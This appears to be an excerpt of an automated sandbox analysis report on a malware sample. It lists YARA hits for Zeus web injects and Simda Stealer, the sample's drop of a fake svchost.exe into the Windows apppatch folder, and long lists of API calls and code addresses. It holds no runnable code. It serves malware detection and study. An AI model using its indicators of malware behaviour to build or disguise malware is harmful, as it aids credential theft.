Source: 00000002.00000003.2136596251.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2695314934.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2666567712.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2711233354.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2649020462.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2670333858.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2638992211.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2682624187.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000E.00000002.2560722712.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2683674807.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.2632514116.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: Bpfz752pYZ.exe PID: 1596, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 4888, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 1656, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 3000, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 616, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 3704, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 4828, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 5576, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 4180, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 5376, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 4836, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 936, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 5720, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 6008, type: MEMORYSTR	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown

Yara detected Simda Stealer

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bpfz752pYZ.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.881000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bpfz752pYZ.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.svchost.exe.881000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Bpfz752pYZ.exe.6f31c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2136779480.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2136596251.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bpfz752pYZ.exe PID: 1596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4888, type: MEMORYSTR

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,	2_2_02C76A30
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C73940 VirtualQuery,VirtualQuery,VirtualQuery,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,	2_2_02C73940
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01743940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,	6_2_01743940
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03103940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,	7_2_03103940
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01523940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,	10_2_01523940

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_004020B0: CreateFileA,VirtualAlloc,DeviceIoControl,CloseHandle,

0_2_004020B0

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_004017F0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,

0_2_004017F0

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	File created: C:\Windows\apppatch\svchost.exe			Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	File created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATA			Jump to behavior

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00433980	0_2_00433980
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0043F190	0_2_0043F190
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0044599D	0_2_0044599D
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0040DA50	0_2_0040DA50
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00442250	0_2_00442250
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00440A60	0_2_00440A60
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00444280	0_2_00444280
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0043E340	0_2_0043E340
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00448360	0_2_00448360
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00422380	0_2_00422380
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00439B90	0_2_00439B90
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00443BB0	0_2_00443BB0
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_004434E0	0_2_004434E0
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0043A4F0	0_2_0043A4F0
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0040DDA0	0_2_0040DDA0
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0043FE00	0_2_0043FE00
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_004416C0	0_2_004416C0
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0043A6D0	0_2_0043A6D0
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_004386F0	0_2_004386F0
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0042CF60	0_2_0042CF60
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0040DFC0	0_2_0040DFC0
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_0044BFE3	0_2_0044BFE3
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00408FB0	0_2_00408FB0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00433980	2_2_00433980
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043F190	2_2_0043F190
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044599D	2_2_0044599D
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0040DA50	2_2_0040DA50
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00442250	2_2_00442250
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00440A60	2_2_00440A60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00444280	2_2_00444280
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043E340	2_2_0043E340
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00448360	2_2_00448360
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00422380	2_2_00422380
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00439B90	2_2_00439B90
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00443BB0	2_2_00443BB0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_004434E0	2_2_004434E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043A4F0	2_2_0043A4F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0040DDA0	2_2_0040DDA0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043FE00	2_2_0043FE00
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_004416C0	2_2_004416C0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0043A6D0	2_2_0043A6D0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_004386F0	2_2_004386F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0042CF60	2_2_0042CF60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0040DFC0	2_2_0040DFC0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_0044BFE3	2_2_0044BFE3
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00408FB0	2_2_00408FB0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C72BB0	2_2_02C72BB0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CAB2C0	2_2_02CAB2C0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CA42D0	2_2_02CA42D0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CA22F0	2_2_02CA22F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CAF240	2_2_02CAF240
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CA9A00	2_2_02CA9A00
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C77BC0	2_2_02C77BC0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C96B60	2_2_02C96B60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CAD0E0	2_2_02CAD0E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CA40F0	2_2_02CA40F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CB61E3	2_2_02CB61E3
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C779A0	2_2_02C779A0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CADE80	2_2_02CADE80
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C77650	2_2_02C77650
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CABE50	2_2_02CABE50
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CAA660	2_2_02CAA660
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C8BF80	2_2_02C8BF80
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CA3790	2_2_02CA3790
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CAD7B0	2_2_02CAD7B0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CA7F40	2_2_02CA7F40
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CB1F60	2_2_02CB1F60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C9D580	2_2_02C9D580
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02CA8D90	2_2_02CA8D90
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029DF280	2_2_029DF280
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029A8A50	2_2_029A8A50
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029DD250	2_2_029DD250
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029DBA60	2_2_029DBA60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029D4B90	2_2_029D4B90
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029BD380	2_2_029BD380
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029DEBB0	2_2_029DEBB0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029D9340	2_2_029D9340
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029E3360	2_2_029E3360
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029E099D	2_2_029E099D
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029DA190	2_2_029DA190
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029CE980	2_2_029CE980
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029D56D0	2_2_029D56D0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029DC6C0	2_2_029DC6C0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029D36F0	2_2_029D36F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029DAE00	2_2_029DAE00
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029A3FB0	2_2_029A3FB0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029A8FC0	2_2_029A8FC0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029E6FE3	2_2_029E6FE3
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029C7F60	2_2_029C7F60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029D54F0	2_2_029D54F0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029DE4E0	2_2_029DE4E0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029A8DA0	2_2_029A8DA0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017861E3	6_2_017861E3
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017479A0	6_2_017479A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017740F0	6_2_017740F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0177D0E0	6_2_0177D0E0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01766B60	6_2_01766B60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01747BC0	6_2_01747BC0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01742BB0	6_2_01742BB0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0177F240	6_2_0177F240
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01779A00	6_2_01779A00
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017722F0	6_2_017722F0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017742D0	6_2_017742D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0177B2C0	6_2_0177B2C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01778D90	6_2_01778D90
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0176D580	6_2_0176D580
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01781F60	6_2_01781F60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01777F40	6_2_01777F40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0177D7B0	6_2_0177D7B0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01773790	6_2_01773790
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0175BF80	6_2_0175BF80
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0177A660	6_2_0177A660
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01747650	6_2_01747650
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0177BE50	6_2_0177BE50
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0177DE80	6_2_0177DE80
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0171A190	6_2_0171A190
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0172099D	6_2_0172099D
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0170E980	6_2_0170E980
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01723360	6_2_01723360
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01719340	6_2_01719340
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0171EBB0	6_2_0171EBB0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01714B90	6_2_01714B90
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_016FD380	6_2_016FD380
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0171BA60	6_2_0171BA60
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0171D250	6_2_0171D250
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_016E8A50	6_2_016E8A50
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0171F280	6_2_0171F280
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_016E8DA0	6_2_016E8DA0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017154F0	6_2_017154F0
